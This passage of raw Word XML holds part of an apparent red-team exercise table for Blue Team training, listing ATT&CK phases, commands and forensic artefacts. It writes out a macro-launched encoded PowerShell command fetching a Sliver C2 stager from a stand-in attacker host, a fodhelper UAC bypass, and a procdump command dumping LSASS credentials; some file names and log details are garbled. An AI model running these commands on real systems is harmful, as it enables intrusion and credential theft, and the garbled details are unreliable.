        <w:t>artefacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> generated, which are crucial for the Blue Team's analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5601BA0A" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AFACFB" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253C52C5" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBA9CA8" w14:textId="77777777" w:rsidR="005C0756" w:rsidRDefault="005C0756" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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895"/>
        <w:gridCol w:w="1350"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="2875"/>
      </w:tblGrid>
      <w:tr w:rsidR="00381E3D" w14:paraId="250E3DC3" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0818D724" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00F50BFC" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F50BFC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Time Stamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C02282A" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00F50BFC" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F50BFC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Phase/TTP ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39CBB3EA" w14:textId="77777777" w:rsidR="00671BC6" w:rsidRPr="00F50BFC" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F50BFC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Procedure &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C1FDFC" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00F50BFC" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F50BFC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command Executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B398E8D" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00F50BFC" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F50BFC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Adversary Note (Goal/Stealth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1EA78B" w14:textId="203CCEEA" w:rsidR="00381E3D" w:rsidRPr="00F50BFC" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F50BFC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t xml:space="preserve">Forensic Observation (Blue Team </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D07609">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Artefact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F50BFC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="76A968CD" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E643982" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>T+0:05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55FEF7A2" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (T1566.001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="316EDFAA" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">User </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>JSmith</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> opens </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Q3_Bonus_Review.docx</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">on </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>CPC-WS01</w:t>
            </w:r>
            <w:r>
              <w:t>. The document's embedded macro executes, launching an encoded PowerShell script.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0587401F" w14:textId="62BD7883" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Minimal file-based </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D07609">
              <w:t>artefact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Relies on the user's trust and the email filter's inability to check for macro logic. </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t>The initial</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> shell is a low-integrity process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30B3A40E" w14:textId="5744AF22" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Windows Event Log (4104)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: New process creation: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>powershell.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">spawned by </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>WINWORD.exe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. The command line contains </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">highly obfuscated Base64 string indicating </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:r>
              <w:t>script block logging failure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="2E8D074D" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C2677C2" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>T+0:15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ACD2DE9" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (T1059.001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C6714B8" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">powershell.exe -e </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>JABjAGwA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>...</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Base64 decoded: Downloads and executes a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Sliver C2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> stager payload from </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>https://attacker-c2.net/beacon</w:t>
            </w:r>
            <w:r>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59929ED9" w14:textId="7E093650" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Establishes a stable, encrypted C2 channel (HTTPS traffic) over port 443, blending in with legitimate web browsing</w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1293634873"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtEndPr/>
              <w:sdtContent>
                <w:r w:rsidR="00794D0D">
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00794D0D">
                  <w:instrText xml:space="preserve">CITATION GVV \l 1033 </w:instrText>
                </w:r>
                <w:r w:rsidR="00794D0D">
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00C1637B">
                  <w:rPr>
                    <w:noProof/>
                  </w:rPr>
                  <w:t xml:space="preserve"> [6]</w:t>
                </w:r>
                <w:r w:rsidR="00794D0D">
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68E4DA06" w14:textId="6EA21B9A" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Network Flow Log:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Unusual outbound traffic volume and destination (unknown IP on port 443). </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>EDR Alert:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Potential threat </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>WINWORD.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>child process creation, but often dismissed as 'noisy'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="716BA0B1" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="735DD6C2" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>T+0:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7204BCBF" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (T1548.002)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AC9D75C" w14:textId="7A6958E7" w:rsidR="00381E3D" w:rsidRDefault="007609F0">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>C:\Users\Public\Temp\fod.exe</w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.exe</w:t>
            </w:r>
            <w:r w:rsidR="00381E3D" w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.exe</w:t>
            </w:r>
            <w:r w:rsidR="00381E3D" w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00381E3D">
              <w:t xml:space="preserve">(UAC bypass via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00381E3D" w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>fodhelper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00381E3D">
              <w:t xml:space="preserve"> or similar technique).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C57B485" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Elevate the shell to a High Integrity level without user interaction to perform system-level dumping (LSASS access requires high integrity).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BB532D2" w14:textId="0FDC85DF" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Windows Event Log (4688):</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Process creation of </w:t>
            </w:r>
            <w:r w:rsidR="00AB3F18">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>C:\Windows\System32\fodhelper.exe.exe.exe.exe.exe.exe.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>followed by an unusual child process (the C2 agent), indicating successful UAC bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="4BE75D1E" w14:textId="77777777" w:rsidTr="00F50BFC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490090A0" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>T+1:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1320" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35B91A60" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (T1003.001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19359CF5" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>C2 Command:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>upload C:\Users\Public\procdump64.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">shell </w:t>
            </w:r>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">procdump64.exe -ma lsass.exe </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>lsass.dmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F668ED">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D332CE" w14:textId="3E36E982" w:rsidR="00381E3D" w:rsidRDefault="00D07609">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Utilises</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00381E3D">
              <w:t xml:space="preserve"> the trusted, legitimate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00381E3D">
              <w:t>Sysinternals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00381E3D">
              <w:t xml:space="preserve"> tool </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00381E3D" w:rsidRPr="00F668ED">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Procdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00381E3D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve"> (a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00381E3D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00381E3D">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00381E3D">
              <w:t xml:space="preserve"> to dump LSASS memory</w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-234779828"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtEndPr/>
              <w:sdtContent>
                <w:r w:rsidR="00794D0D">
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00794D0D">
                  <w:instrText xml:space="preserve"> CITATION Sco20 \l 1033 </w:instrText>
                </w:r>
                <w:r w:rsidR="00794D0D">
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00C1637B">
                  <w:rPr>
                    <w:noProof/>
                  </w:rPr>
                  <w:t xml:space="preserve"> [3]</w:t>
                </w:r>
